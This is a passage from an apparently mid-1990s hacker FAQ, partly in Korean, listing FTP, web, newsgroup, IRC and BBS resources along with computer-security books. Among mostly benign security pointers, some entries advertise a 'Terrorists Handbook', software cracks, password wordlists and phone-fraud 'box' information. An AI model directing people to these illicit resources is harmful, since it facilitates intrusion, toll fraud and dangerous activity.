N ftp.netcom.com /pub/ty/tym (TYM)

ftp.netcom.com /pub/va/vandal (DnA)

ftp.netcom.com /pub/wt/wtech/

N ftp.netcom.com /pub/zi/zigweed (H/P)

ftp.netcom.com /pub/zz/zzyzx (H/P)

ftp.netsys.com

ftp.ocs.mq.edu.au /PC/Crypt (Cryptology)

ftp.ox.ac.uk /pub/comp/security

ftp.ox.ac.uk /pub/crypto (Cryptology)

ftp.ox.ac.uk /pub/wordlists (Wordlists)

ftp.paranoia.com /pub/toneloc/tl110.zip (ToneLoc)

N ftp.pipex.net /pub/areacode (uk areacodes)

ftp.pop.psu.edu

ftp.primenet.com /users/i/insphrk

ftp.primenet.com /users/k/kludge (H/P)

ftp.primenet.com /users/s/scuzzy (Copy Protection)

ftp.primus.com /pub/security (Security)

ftp.psy.uq.oz.au

ftp.psy.uq.oz.au /pub/DES

ftp.rahul.net /pub/conquest/DeadelviS/script/vms/

ftp.rahul.net /pub/lps (Home of the FAQ)

ftp.sert.edu.au

ftp.sgi.com

N ftp.smartlink.net /pub/users/mikes/haq

ftp.std.com /archives/alt.locksmithing (Locksmithing)

ftp.std.com /obi/Mischief/ (MIT Guide to Locks)

ftp.std.com /obi/Phracks (Zines)

ftp.sunet.se /pub/network/monitoring (Ethernet sniffers)

ftp.sura.net /pub/security (SURAnet)

ftp.technet.sg

U ftp.technion.ac.il

ftp.tis.com /pub (TIS)

ftp.tisl.ukans.edu /pub/security

ftp.uni-koeln.de (Wordlists)

ftp.uspto.gov

ftp.uu.net /doc/literary/obi/Phracks (Zines)

ftp.uwp.edu /pub/dos/romulus/cracks (Copy Protection)

ftp.vis.colostate.edu

ftp.vix.com

ftp.vortex.com

ftp.warwick.ac.uk /pub/cud (Zines)

ftp.wi.leidenuniv.nl /pub/security

ftp.win.tue.nl /pub/security (Security)

ftp.winternet.com /users/nitehwk (H/P)

ftp.wustl.edu /doc/EFF (EFF)

ftp.zoom.com

ftp.zrz.tu-berlin.de/pub/security/virus/texts/crypto (Cryptology)

garbo.uwasa.fi /pc/crypt (Cryptology)

N gemini.tuc.noao.edu /pub/grandi

gti.net /pub/safetynet

gumby.dsd.trw.com

hack-this.pc.cc.cmu.edu (Down for Summer)

heffer.lab.csuchico.edu (Third Stone From The Sun)

hplyot.obspm.fr

info.mcs.anl.gov

N infonexus.com /pub (The Guild)

jerico.usc.edu

l0pht.com (The L0pht)

lcs.mit.edu /telecom-archives (Telecom archives)

lod.com (Legion of Doom)

mac.archive.umich.edu

mary.iia.org /pub/users/patriot (Misc)

monet.ccs.itd.umich.edu

N net-dist.mit.edu /pub/pgp

net.tamu.edu /pub/security/TAMU (Security)

net23.com /pub (Max Headroom)

nic.ddn.mil /scc (DDN Security)

nic.sura.net /pub/security

oak.oakland.edu /pub/hamradio (Ham Radio)

oak.oakland.edu /SimTel/msdos/sound (DTMF decoders)

oak.oakland.edu /SimTel/msdos/sysutil (BIOS attackers)

parcftp.xerox.com

prism.nmt.edu /pub/misc (Terrorist Handbook)

pyrite.rutgers.edu /pub/security (Security)

relay.cs.toronto.edu /doc/telecom-archives (Telecom)

rena.dit.co.jp /pub/security (Security)

research.att.com /dist/internet_security (AT&T)

ripem.msu.edu /pub/crypt (Ripem)

N rmii.com /pub2/KRaD (KRaD Magazine)

rtfm.mit.edu (Etext)

rtfm.mit.edu /pub/usenet-by-group (Usenet FAQ's)

scss3.cl.msu.edu /pub/crypt (Cryptology)

N sgigate.sgi.com /Security (SGI Security)

sierra.stanford.edu

spy.org (CSC)

N src.doc.ic.ac.uk /usenet/uk.telecom (uk.telecom archives)

suburbia.apana.org.au /pub/unix/security (Security)

sunsolve1.sun.com

theta.iis.u-tokyo.ac.jp /pub1/security (Security)

titania.mathematik.uni-ulm.de /pub/security (Security)

toxicwaste.mit.edu /pub/rsa129/README (Breaking RSA)

ugle.unit.no

unipc20.unimed.sintef.no

vic.cc.purdue.edu

vixen.cso.uiuc.edu /security

N web.mit.edu

whacked.l0pht.com (Mac + H/P)

wimsey.bc.ca /pub/crypto (Cryptology)

N wuarchive.wustl.edu /pub/aminet/util/crypt



해커에게 관심가는 fsp 사이트는 무엇인가?

None at this time.


해커에게 관심가는 뉴스그룹은 무엇인가?

alt.2600 Do it 'til it hertz

N alt.2600hz

N alt.2600.codez

N alt.2600.debate

N alt.2600.moderated

alt.cellular

alt.cellular-phone-tech Brilliant telephony mind blow netnews naming

alt.comp.virus An unmoderated forum for discussing viruses

alt.comp.virus.source.code

alt.cracks Heavy toolbelt wearers of the world, unite

alt.cyberpunk High-tech low-life.

alt.cyberspace Cyberspace and how it should work.

alt.dcom.telecom Discussion of telecommunications technology

alt.engr.explosives [no description available]

alt.fan.kevin-mitnick

alt.fan.lewiz Lewis De Payne fan club

alt.hackers Descriptions of projects currently under development

alt.hackintosh

alt.locksmithing You locked your keys in *where*?

alt.hackers.malicious The really bad guys - don't take candy from them

alt.ph.uk United Kingdom version of alt.2600

alt.privacy.anon-server Tech. & policy matters of anonymous contact servers

alt.radio.pirate Hide the gear, here comes the magic station-wagons.

alt.radio.scanner Discussion of scanning radio receivers.

alt.satellite.tv.europe All about European satellite tv

alt.security Security issues on computer systems

alt.security.index Pointers to good stuff in misc.security (Moderated)

alt.security.keydist Exchange of keys for public key encryption systems

alt.security.pgp The Pretty Good Privacy package

alt.security.ripem A secure email system illegal to export from the US

comp.dcom.cellular [no description available]

comp.dcom.telecom Telecommunications digest (Moderated)

comp.dcom.telecom.tech [no description available]

comp.org.cpsr.announce Computer Professionals for Social Responsibility

comp.org.cpsr.talk Issues of computing and social responsibility

comp.org.eff.news News from the Electronic Frontiers Foundation

comp.org.eff.talk Discussion of EFF goals, strategies, etc.

N comp.os.netware.security Netware Security issues

comp.protocols.kerberos The Kerberos authentification server

comp.protocols.tcp-ip TCP and IP network protocols

comp.risks Risks to the public from computers & users

comp.security.announce Announcements from the CERT about security

N comp.security.firewalls Anything pertaining to network firewall security

comp.security.misc Security issues of computers and networks

comp.security.unix Discussion of Unix security

comp.virus Computer viruses & security (Moderated)

de.org.ccc Mitteilungen des CCC e.V.

misc.security Security in general, not just computers (Moderated)

rec.pyrotechnics Fireworks, rocketry, safety, & other topics

rec.radio.scanner [no description available]

rec.video.cable-tv Technical and regulatory issues of cable television

sci.crypt Different methods of data en/decryption




해 커에게 관심가는 telnet 사이트는 무엇인가?

anarchy-online.com

ntiabbs.ntia.doc.gov (NTIA)

l0pht.com (The L0pht)

sfpg.gcomm.com (The Floating Pancreas)

telnet lust.isca.uiowa.edu 2600 (underground bbs) (temporarily down)

pcspm2.dar.csiro.au (Virtual Doughnutland BBS)

prince.carleton.ca 31337 (Twilight of The Idols)

N spy.org (Computer Systems Consulting)





해커에게 관심가는 gopher 사이트는 무엇인가?

ba.com (Bell Atlantic)

N cell-relay.indiana.edu (Cell Relay Retreat)

csrc.ncsl.nist.gov (NIST Security Gopher)

gopher.acm.org (SIGSAC (Security, Audit & Control))

gopher.cpsr.org (Computer Professionals for Social Responsibility)

gopher.eff.org (Electonic Frontier Foundation)

N gopher.panix.com (Panix)

gw.PacBell.com (Pacific Bell)

iitf.doc.gov (NITA -- IITF)

N info.itu.ch (International Telegraph Union)

ncjrs.aspensys.com (National Criminal Justice Reference Service)

oss.net (Open Source Solutions)

spy.org (Computer Systems Consulting)

wiretap.spies.com (Wiretap)






해커에게 관심가는 WWW 사이트는 무엇인가?

N 134.220.198.66:8000 (Peter Strangman's)

U alcuin.plymouth.edu/~jay/underground.html (Underground Links)

U all.net (American Society for Industrial Security anagement)

alumni.caltech.edu/~dank/isdn/ (ISDN)

N asearch.mccmedia.com/www-security.html (WWW-security info)

aset.rsoc.rockwell.com (NASA/MOD AIS Security)

aset.rsoc.rockwell.com/exhibit.html (Tech. for Info Sec)

att.net/dir800 (800 directory)

ausg.dartmouth.edu/security.html (UNIX Security Topics)

N bianca.com/bump/ua (Unauthorized Access Home Page)

N ccnga.uwaterloo.ca/~jscouria/gsm.html (GSM Specification)

N cell-relay.indiana.edu/cell-relay (Cell Relay Retreat)

N ciac.llnl.gov (CIAC Web Site)

N community.net/community/all/home/solano/sbaldwin

N cs.purdue.edu/homes/spaf/coast.html (The COAST Project and Laboratory)

N csbh.mhv.net/dcypher/home.html (Dcypher's Home Page)

N csrc.ncsl.nist.gov (NIST)

N cwix.com/cwplc (Cable and Wireless)

daemon.apana.org.au/~longi/

N dcpu1.cs.york.ac.uk:6666/fisher/telecom (Embryonic Telephone History Page)

N dfw.net/~aleph1 (The Uebercracker's Security Web)

N draco.centerline.com:8080/~franl/crypto.html (Crypto)

N draco.centerline.com:8080/~franl/privacy/bacard-review.html

N enigma.pc.cc.cmu.edu/~caffeine/home.html (Caffeine's Home Page)

N everest.cs.ucdavis.edu/Security.html (UCDavis.edu Security Page)

N everest.cs.ucdavis.edu/slides/slides.html (Security Lab Slides)

ezinfo.ethz.ch/ETH/D-REOK/fsk/fsk_homepage.html (CSSCR)

N fastlane.net/homepages/thegnome (Simple Nomad)

N first.org (FIRST)

N freeside.com/phrack.html (Phrack Magazine)

N frosted.mhv.net/keytrap.html

N ftp.arpa.mil (ARPA home page)

ftp.tamu.edu/~abr8030/security.html (Security)

N grove.ufl.edu/~bytor (Bytor home page)

N hightop.nrl.navy.mil/potpourri.html (MOD Security)

N hightop.nrl.navy.mil/rainbow.html (MOD Rainbow Books)

ice-www.larc.nasa.gov/ICE/papers/hacker-crackdown.html (Sterling)

ice-www.larc.nasa.gov/ICE/papers/nis-requirements.html (ICE NIS)

info.bellcore.com/BETSI/betsi.html (Betsi)

N info.gte.com (GTE Labrotories)

N info.mcc.ac.uk/Orange (Orange)

infosec.nosc.mil/infosec.html (SPAWAR INFOSEC)

N infosec.nosc.mil/navcirt.html (NAVCIRT)

N iss.net/iss (Internet Security Systems)

N jumper.mcc.ac.uk/~afs/telecom (UK Telecom Pricing Information)

l0pht.com (The l0pht)

l0pht.com/~oblivion/IIRG.html (Phantasy Magazine)

N l0pht.com/~spacerog/index.html (Whacked Mac Archives)

N lcs.mit.edu/telecom-archives/areacodes/guide (North American Area Codes)

N lcs.mit.edu/telecom-archives/npa.800 (1-800 Info)

N lcs.mit.edu/telecom-archives/npa.900 (1-900 Info)

N lod.com (Legion of Doom)

N lod.com/~gatsby (Gatsby)

N lod.com/~tabas (Mark Tabas -- LOD)

N lod.com/~vampire/emptime7 (Empire Times)

N magicnet.net/xtabi/netscape/links/cypher.html (Cryptology)

N mars.superlink.net/user/esquire (Red box info)

matrix.resnet.upenn.edu/rourke (FakeMail FAQ)

mindlink.jolt.com (The Secrets of LockPicking)

N mindlink.net/A7657 (Stephen H Kawamoto's Home Page)

mls.saic.com (SAIC MLS)

N mnementh.cs.adfa.oz.au/Lawrie_Brown.html (Lawrie Brown's crypto bibliography)

motserv.indirect.com (Motorola)

U naic.nasa.gov/fbi (FBI information)

U nasirc.nasa.gov/NASIRC_home.html (NASIRC)

obscura.com/~loki/ (Cryptology)

ophie.hughes.american.edu/~ophie (Ophie)

oregano.sl.pitt.edu/index.htm

N outpost.callnet.com/outpost.html

pages.ripco.com:8080/~glr/glr.html (Full Disclosure)

U peg.pegasus.oz.au (EFF Australia)

N quetel.qc.ca/qt0000ag.htm (Quebec-Telephone)

N resudox.net/bio/mainpage.html (BioHazard's Home Page)

N ripco.com:8080/~glr/glr.html (Full Disclosure)

N rschp2.anu.edu.au:8080/crypt.html

N scitsc.wlv.ac.uk/~cs6171/hack (UNIX Security)

U seclab.cs.ucdavis.edu/Security.html (Security)

U seclab.cs.ucdavis.edu/slides/slides.html (Security Lab Slides)

N sfpg.gcomm.com/mitnick/mitnick.htm (3wP Kevin Mitnick WWW HomePage)

N smurfland.cit.buffalo.edu/NetMan/index.html (Network anagement)

N sunsite.unc.edu/sun/inform/sun-info.html (Sun Microsystems Sponsor Page)

N support.mayfield.hp.com (Hewlett Packard SupportLine Services)

N tamsun.tamu.edu/~clm3840/hacking.html (Hacking/Phreaking)

the-tech.mit.edu (LaMacchia case info)

N town.hall.org/university/security/stoll/cliff.html (Cliff Stoll)

turnpike.net/emporium/C/celestial/celest.html (Detective Databases 1995)

ucs.orst.edu:8001/mintro.html (Micro Power Broadcasting)

underground.org (Eubercrackers)

unixg.ubc.ca:780/~jyee/ (Cell)

w3.gti.net/safety

N web.mit.edu/network/pgp.html (Getting PGP)

N web.nec.com/products/necam/mrd/cellphones/index.html(NEC)

U weber.u.washington.edu/~phantom/cpunk/index.html (Cryptology)

N wildsau.idv.uni-linz.ac.at/~klon/underground/underground.html (Klon's Underground Links)

wintermute.itd.nrl.navy.mil/5544.html (Network Security)

N www-mitpress.mit.edu/mitp/recent-books/comp/pgp-source.html

N www-ns.rutgers.edu/www-security/index.html (Rutger's documents on WWW security)

U www-personal.engin.umich.edu/~jgotts/underground/boxes.html (Box info)

U www-personal.engin.umich.edu/~jgotts/underground/hack-faq.html(This document)

N www-swiss.ai.mit.edu/~bal/pks-toplev.html (Findingsomeone's PGP key)

www.2600.com (2600 Magazine)

N www.8lgm.org (8lgm Security Advisories)

www.aads.net (Ameritech)

N www.access.gpo.gov/su_docs/

N www.aloha.com/~seanw/index.html

www.alw.nih.gov/WWW/security.html (Unix Security)

N www.artcom.de/CCC/hotlist.html (Chaos Computer Club Hotlist)

N www.artech-house.com/artech.html (Artech House)

N www.asg.unb.ca (Atlantic Systems Group Mosaic Index)

www.aspentec.com/~frzmtdb/fun/hacker.html

N www.aston.ac.uk/~bromejt/mobile.html (Mobile Phone Service Locator)

N www.att.com (ATT)

N www.auditel.com (Auditel)

N www.auscert.org.au (Australian CERT)

N www.axent.com/axent (Axent Technologies)

www.ba.com (Bell Atlantic)

N www.bctel.com (BC Tel)

www.beckman.uiuc.edu/groups/biss/VirtualLibrary/xsecurity.html(X-Win)

N www.bell.ca (Bell Canada)

www.bell.com (MFJ Task Force)

www.bellcore.com/SECURITY/security.html (Bellcore Security Products)

N www.border.com (Border Network Technologies)

www.brad.ac.uk/~nasmith/index.html

N www.brad.ac.uk/~nasmith/underground.html (Undergound WWW Sites)

www.bst.bls.com (BellSouth)

N www.bt.co.uk (British Telecom)

N www.business.co.uk/cellnet (Cellnet)

N www.c2.org:80/remail/by-www.html (WWW-based remailing form)

www.c3.lanl.gov/~mcn (Lanl)

www.cam.org/~gagnon (OCP's)

U www.careermosaic.com/cm/uswest (USWest)

N www.castle.net/~kobrien/telecom.html (Telecom)

N www.cco.caltech.edu/~rknop/amiga_pgp26.html

N www.cdt.org/cda.html

N www.cec.wustl.edu/~dmm2/egs/egs.html (En Garde Systems)

www.cert.dfn.de/ (German First Team)

N www.checkpoint.com (Checkpoint)

N www.chem.surrey.ac.uk/~ch11mh/secure.html (Another page on secure WWW server

setup)

N www.cis.ksu.edu/~psiber/fortress/phreak/ph2reak.html (Are You Some Kind Of PHREAK!)

www.cis.ohio-state.edu/hypertext/faq/usenet/alt-2600-faq/faq.html

N www.cityscape.co.uk/users/ek80/index.html (Inside Cable Cover)

N www.cohesive.com (Cohesive Systems)

www.commerce.net/information/standards/drafts/shttp.txt (HyperText)

www.con.wesleyan.edu/~triemer/network/docservs.html

www.contrib.andrew.cmu.edu:8001/usr/dscw/home.html

N www.cosc.georgetown.edu/~denning/crypto (The Cryptography Project)

N www.cost.se (COST Computer Security Technologies)

www.cpsr.org/home (CPSR)

N www.crimson.com/isdn/telecomacry.txt (Crimson's Telecommunications Acronyms)

N www.crtc.gc.ca (CRTC - Canadian regulator)

N www.cs.berkeley.edu/~raph/remailer-list.html (Anon remailer list)

U www.cs.cmu.edu:8001/afs/cs.cmu.edu/user/bsy/www/sec.html (CMU Security)

U www.cs.purdue.edu/coast/coast.html (Coast)

N www.cs.purdue.edu/pcert/pcert.html (PCERT)

N www.cs.tu-bs.de (Network management Tools)

www.cs.tufts.edu/~mcable/cypher/alerts/alerts.html (Cypherpunk)

www.cs.umd.edu/~lgas (Laughing Gas)

N www.cs.umd.edu/~lgas/haquerwerld/haquer-individuals.html(Haquerwerld)

www.csd.harris.com/secure_info.html (Harris)

www.csl.sri.com (SRI Computer Science Lab)

U www.csua.berekeley.edu/pub/cypherpunks/Home.html (Cryptology)

N www.cwi.nl/cwi/people/Jack.Jansen/spunk/cookbook.html

N www.cyber.co.uk/~joyrex (Joyrex Cellular)

www.cybercafe.org/cybercafe/pubtel/pubdir.html (CyberCafe)

N www.cygnus.com/~gnu/export.html (Cryptography Export Control Archives)

U www.datafellows.fi (Data Fellows (F-Prot)

N www.datasync.com/~sotmesc/sotmesc.html (SotMESC)

N www.dcs.exeter.ac.uk/~aba (Cypherpunk)

www.dct.ac.uk/~misb3cp/2600/faq.txt

N www.demon.co.uk/mobiles (C.C.Mobiles)

N www.dhp.com (DataHaven Project)

N www.dhp.com/~pluvius (Pluvius' Home Page)

U www.digicash.com/ecash/ecash-home.html (Ecash Home Page)

www.digital.com/info/key-secure-index.html (Digital Secure Systems)

www.dnai.com/~gui/index.html

N www.dtic.dla.mil/defenselink (Office of the U.S. Secretary of Defense

(OSD)

N www.dtic.dla.mil/iac (DoD Information Analysis Center (IAC)

Hub Page)

N www.eecs.nwu.edu/~jmyers/bugtraq/about.html

N www.eecs.nwu.edu/~jmyers/bugtraq/archives.html

www.eecs.nwu.edu/~jmyers/bugtraq/index.html (Bugtraq)

www.eecs.nwu.edu/~jmyers/ids/index.html (Intrusion Detection Systems)

N www.eff.org

N www.eff.org/pub/Alerts

N www.eff.org/pub/Net_info/Tools/Crypto/

www.emap.co.uk/partners/racal-airtech (Racal-Airtech)

www.ensta.fr/internet/unix/sys_admin (System administration)

N www.epic.org

N www.ericsson.nl (Ericsson)

www.etext.org/Zines/ (Zines)

N www.farmstead.com (Farmstead)

U www.fbi.gov/fbi/FBI_homepage.html (FBI Homepage)

www.fc.net/defcon (DefCon)

www.fedworld.gov (Federal Government)

www.first.org/first/ (FIRST)

N www.fonorola.net (Fonorola (a Canadian carrier)

N www.frus.com (Firewalls R Us)

www.gbnet.net/kbridge (KarlBridge)

www.getnet.com/crak (CRAK Software)

N www.getnet.com/~vision

N www.gold.net/users/cw78 (FleXtel)

www.greatcircle.com (Great Circle Associates)

N www.gsu.edu/~socrerx/catalog.html

N www.gta.com/index.html (Global Technology Associates)

N www.gti.net/grayarea (Gray Areas)

U www.hotwired.com (Wired Magazine)

www.hpcc.gov/blue94/section.4.6.html (NSA)

N www.hq2.telecom.ie (Telecom Eireann)

N www.iacr.org/~iacr (International Association of Cryptologic

Research (IACR)

N www.ibmpcug.co.uk/~Vidtron (Videotron)

N www.ic.gov (Central Intelligence Agency Home Page)

N www.ifi.uio.no/~staalesc/PGP/home.html

N www.iia.org/~gautier/me.html (Rich Gautier's Home Page)

N www.indirect.com/www/evildawg

www.indirect.com/www/johnk/ (CRAK Software)

N www.ingress.com (Ingress Communications)

N www.interaccess.com/trc/tsa.html

N www.io.org/~djcl/phoneb.html

N www.iquest.net/~oseidler (Oliver Seidler's WWW Page)

N www.itd.nrl.navy.mil/ITD/5540 (NRL Center for High Assurance Computer

Systems)

N www.itu.ch/TELECOM (Telecom '95)

N www.jagunet.com/~john/

N www.jedefense.com/jed.html (Journal of Electronic Defense)

N www.l0pht.com/cdc.html (Cult of the Dead Cow)

N www.l0pht.com/radiophone (Radiophone Archive)

N www.l0pht.com/~oblivion/IIRG.html (International Information Retrieval Guild

Archive Site)

N www.lat.com (Los Altos Technologies)

www.lerc.nasa.gov/Unix_Team/Dist_Computing_Security.html (Security)

N www.lib.iup.edu/~seaman/hack/bone.html (Bone's H/P/C page o' rama)

N www.links.net

N www.louisville.edu/~wrbake01 (The GodZ of CyberSpacE)

www.lysator.liu.se:7500/mit-guide/mit-guide.html (Lockpicking Guide)

www.lysator.liu.se:7500/terror/thb_title.html (Terrorists Handbook)

www.magi.com/~vektor/linenoiz.html

N www.mastercard.com (Secure Electronic Payment Protocol)

www.mcs.com/~candyman/http/radio.html (Radar)

www.mcs.com/~candyman/under.html (Cell)

N www.mcs.net/~candyman (H/P)

www.mgmua.com/hackers/index.html (Hackers, the movie)

N www.milkyway.com (Milkyway Networks Corporation)

N www.mit.edu:8001/people/warlord/pgp-faq.html (PGP 2.6.2 FAQ, Buglist, Fixes, and

Improvements)

N www.monmouth.com/~jshahom (The Insomniac's Home Page)

N www.mot.com (Motorola)

www.mpr.ca/ (MPR Teltech Ltd)

N www.msen.com/~emv/tubed/spoofing.html (Info on IP spoofing attacks)

N www.mwjournal.com/mwj.html (Microwave Journal)

N www.ncsa.uiuc.edu/SDG/Software/Mosaic/Docs/security.html(Security in Mosaic)

N www.ncsl.nist.gov (NIST Computer Systems Laboratory)

www.net23.com (Max Headroom)

N www.netpart.com (NetPartners)

www.netresponse.com:80/zldf/

N www.nic.surfnet.nl/surfnet/security/cert-nl.html(CERT-NL)

www.nist.gov (NIST)

N www.nokia.com (Nokia)

N www.nortel.com (Northern Telecom)

www.ntt.jp (Nippon Telephone)

N www.nynex.co.uk/nynex (NYNEX)

U www.odci.gov (The CIA)

N www.one2one.co.uk (Mercury One-2-One)

N www.open.gov.uk/oftel/oftelwww/oftelhm.htm (OFTEL's Home Page)

www.openmarket.com/info/cryptography/applied_cryptography.html

www.pacbell.com (Pacific Bell)

N www.panix.com/vtw

www.paranoia.com/astrostar/fringe.html

N www.paranoia.com/hpa (Paranoia's H/P/A Links)

www.paranoia.com/mthreat (ToneLoc)

N www.paranoia.com/~coldfire (Cold Fire's Web Page)

N www.paranoia.com/~darkfox (Darkfox's Home Page)

N www.paranoia.com/~ice9 (Ice-9's Home Page)

www.pegasus.esprit.ec.org/people/arne/pgp.html (PGP)

N www.phantom.com/~darkcyde (DarkCyde)

N www.phantom.com/~king (Randy King's WWW Page)

N www.phillips.com (Phillips Electronics)

N www.phred.org (The Phred Networking Organization)

N www.pic.net/uniloc/starlink (Starlink)

www.planet.net/onkeld (BlueBeep Home Page)

www.primenet.com/~kludge/haqr.html (Kludge)

www.quadralay.com/www/Crypt/Crypt.html (Quadralay Cryptography)

www.qualcomm.com/cdma/wireless.html (Qualcomm CDMA)

N www.ramp.com/~lcs/winpgp.html (PGP with MS/Win)

N www.raptor.com (Raptor)

www.raptor.com/raptor/raptor.html (Raptor Network Isolator)

www.research.att.com (AT&T)

N www.rocksoft.com/~ross (Rocksoft Pty (Veracity)

N www.rogers.com (Rogers Communications)

www.rsa.com (RSA Data Security)

N www.sasknet.sk.ca/Pages/sktlhome.html (SaskTel)

www.satelnet.org/~ccappuc

N www.sccsi.com/lsli/lsli.homepage.html (PORTUS)

N www.sctc.com (Secure Computing Corporation)

www.seas.upenn.edu/~rourkem (FakeMail FAQ)

N www.seduction.com

N www.sei.cmu.edu/SEI/programs/cert.html (CERT Coordination Center)

N www.service.com/cm/uswest/usw1.html (USWest)

N www.shore.net/~eskwired/hp.html

N www.soci.niu.edu/~cudigest

N www.somar.com (Somar Software)

N www.soscorp.com (Sources of Supply Corp)

www.spatz.com/pecos/index.html (The World of Hacking)

www.spy.org (Computer Systems Consulting)

N www.spy.org (spy.org)

www.sri.com (SRI)

N www.stentor.ca (Stentor (Canadian telcos)

N www.tecc.co.uk/public/uk-telecom/btns.html (BT "star services")

N www.telecoms-mag.com/tcs.html (Telecommunications agazine)

N www.telkom.co.za (Telkom S.A. Ltd)

www.telstra.com.au/info/security.html (Security Reference Index)

N www.teresa.com

www.tezcat.com/web/security/security_top_level.html

N www.tiac.net/users/triad/philes/jokai.html (Jokai Reservation for the Preservation of the

1st Amendment)

N www.ticllc.net/~scrtnizr

www.tis.com (Trusted Information Systems)

N www.trcone.com/t_crookb.html (CrookBook)

N www.tregistry.com/ttr (Telecomunications Training Courses)

www.tri.sbc.com (Southwestern Bell)

www.tricon.net/Comm/synapse (Synapse Magazine)

www.tufts.edu/~jpagano/

N www.uccs.edu/~abusby/hpawebsites.html

N www.uccs.edu/~abusby/k0p.html (kn0wledge phreak)

www.uci.agh.edu.pl/pub/security (Security)

N www.uknet.net/pnc (The Personal Number Company)

www.umcc.umich.edu/~doug/virus-faq.html (Virus)

N www.underground.org (underground.org)

N www.underground.org/bugs/

www.usfca.edu/crackdown/crack.html (Hacker Crackdown)

N www.vodafone.co.uk (Vodafone)

N www.vptt.ch/natel.html (Natel)

U www.wam.umd.edu/~ankh/public/devil_does_unix

N www.warwick.ac.uk/WWW/search/Phones/nng.html (National Number Group Codes)

N www.well.com/user/abacard

N www.well.com/user/crunch (Captain Crunch)

N www.wfu.edu/~wilsonbd

www.wiltel.com (Wiltel)

N www.wiltel.com/glossary/glossary.html (Telecommunications Glossary)

N www.wired.com (HotWired)

N www2.undernet.org:8080/~cs93jtl/IRC.html (IRC)

In addition to browsing these fine pages, you can often find what you

are looking for by using one of these automated search engines:

www.yahoo.com

www.lycos.com

www.webcrawler.com






해커에게 관심가는 IRC 채널은 무엇인가?

#2600

#cellular

#hack

#phreak

#linux

#realhack

#root

#unix

#warez



해커에게 관심가는 BBS는 무엇인가?

Rune Stone (203)832-8441 NUP: Cyberdeck

The Truth Sayer's Domain (210)493-9975

Hacker's Haven (303)343-4053

Independent Nation (413)573-1809

Ut0PiA (315)656-5135

underworld_1994.com (514)683-1894

Alliance Communications (612)251-8596

Maas-Neotek (617)855-2923

Apocalypse 2000 (708)676-9855

K0dE Ab0dE (713)579-2276

fARM R0Ad 666 (713)855-0261

kn0wledge Phreak <k0p> BBS (719)578-8288 NUP=NO NUP

N The Edge of Reality (805)496-7460

Static Line (806)747-0802

Area 51 (908)526-4384

N The Drunk Forces +972-3-5733477



해커에게 관심가는 책은 무엇인가?

General Computer Security

~~~~~~~~~~~~~~~~~~~~~~~~~

Computer Security Basics

Author: Deborah Russell and G.T. Gengemi Sr.

Publisher: O'Reilly & Associates, Inc.

Copyright Date: 1991

ISBN: 0-937175-71-4

뛰어난 책이다.

세세한 부분이 빠지지 않고 전체적인 컴퓨터 보안에 대한 조감을 할 수 있게 한다.

초보 보안 전문가에게 필독서이다.

Information Systems Security

Author: Philip Fites and Martin Kratz

Publisher: Van Nostrad Reinhold

Copyright Date: 1993

ISBN: 0-442-00180-0

Computer Related Risks

Author: Peter G. Neumann

Publisher: Addison-Wesley

Copyright Date: 1995

ISBN: 0-201-55805-X

Computer Security Management

Author: Karen Forcht

Publisher: boyd & fraser publishing company

Copyright Date: 1994

ISBN: 0-87835-881-1

The Stephen Cobb Complete Book of PC and LAN Security

Author: Stephen Cobb

Publisher: Windcrest Books

Copyright Date: 1992

ISBN: 0-8306-9280-0 (hardback) 0-8306-3280-8 (paperback)

Security in Computing

Author: Charles P. Pfleeger

Publisher: Prentice Hall

Copyright Date: 1989

ISBN: 0-13-798943-1.

Building a Secure Computer System

Author: Morrie Gasser

Publisher: Van Nostrand Reinhold Co., New York.

Copyright Date:

ISBN: 0-442-23022-2

Modern Methods for Computer Security

Author: Lance Hoffman

Publisher: Prentice Hall

Copyright Date: 1977

ISBN:

Windows NT 3.5 Guidelines for Security, Audit and Control

Author:

Publisher: Microsoft Press

Copyright Date:

ISBN: 1-55615-814-9

Protection and Security on the Information Superhighway

Author: Dr. Frederick B. Cohen)

Publisher: John Wiley & Sons

Copyright Date: 1995

ISBN: 0-471-11389-1

N Commonsense Computer Security

Author: Martin Smith

Publisher: McGraw-Hill

Copyright Date: 1993

ISBN: 0-07-707805-5

N Combatting Computer Crime

Author: Jerry Papke

Publisher: McGraw-Hill, Inc. / Chantico Publishing Company, Inc.

Copyright Date: 1992

ISBN: 0-8306-7664-3

N Computer Crime: a Crimefighters Handbook

Author: David Icove, Karl Seger and William VonStorch

Publisher: O'Reilly & Associates

Copyright Date: 1995

ISBN: 1-56592-086-4

Unix System Security

~~~~~~~~~~~~~~~~~~~~

Practical Unix Security

Author: Simson Garfinkel and Gene Spafford

Publisher: O'Reilly & Associates, Inc.

Copyright Date: 1991

ISBN: 0-937175-72-2

Firewalls and Internet Security

Author: William Cheswick and Steven Bellovin

Publisher: Addison Wesley

Copyright Date: 1994

ISBN: 0-201-63357-4

Unix System Security

Author: Rik Farrow

Publisher: Addison Wesley

Copyright Date: 1991

ISBN: 0-201-57030-0

Unix Security: A Practical Tutorial

Author: N. Derek Arnold

Publisher: McGraw Hill

Copyright Date: 1993

ISBN: 0-07-002560-6

Unix System Security: A Guide for Users and Systems Administrators

Author: David A. Curry

Publisher: Addison-Wesley

Copyright Date: 1992

ISBN: 0-201-56327-4

Unix System Security

Author: Patrick H. Wood and Stephen G. Kochan

Publisher: Hayden Books

Copyright Date: 1985

ISBN: 0-672-48494-3

Unix Security for the Organization

Author: Richard Bryant

Publisher: Sams

Copyright Date: 1994

ISBN: 0-672-30571-2

N Building Internet Firewalls

Author: D. Brent Chapman and Elizabeth D. Zwicky

Publisher: O'Reilly and Associates, Inc.

Copyright Date: 1995

ISBN: 1-56592-124-0

N Unix System Security Essentials

Author: Christopher Braun

Publisher: Addison Wesley

Copyright Date: 1995

ISBN: 0-201-42775-3

N Internet Firewalls and Network Security

Author: Karanjit S. Siyan and Chris Hare

Publisher: New Riders Publishing

Copyright Date: 1995

ISBN: 1-56205-437-6

Network Security

~~~~~~~~~~~~~~~~

Network Security Secrets

Author: David J. Stang and Sylvia Moon

Publisher: IDG Books

Copyright Date: 1993

ISBN: 1-56884-021-7

완전 종이 낭비는 아니지만, $49.95의 구입가격은 너무 비싸다.

이 책은 이미 출판된 정보를 재 배열한 것이다.

이 책을 읽어서 알 수 있는 유일한 비밀은 젊은 여자인

Sylvia Moon이 David Stang이란 나이든 사람을 미친 듯이 사랑한다는 것이다.

Complete Lan Security and Control

Author: Peter Davis

Publisher: Windcrest / McGraw Hill

Copyright Date: 1994

ISBN: 0-8306-4548-9 and 0-8306-4549-7

Network Security

Author: Steven Shaffer and Alan Simon

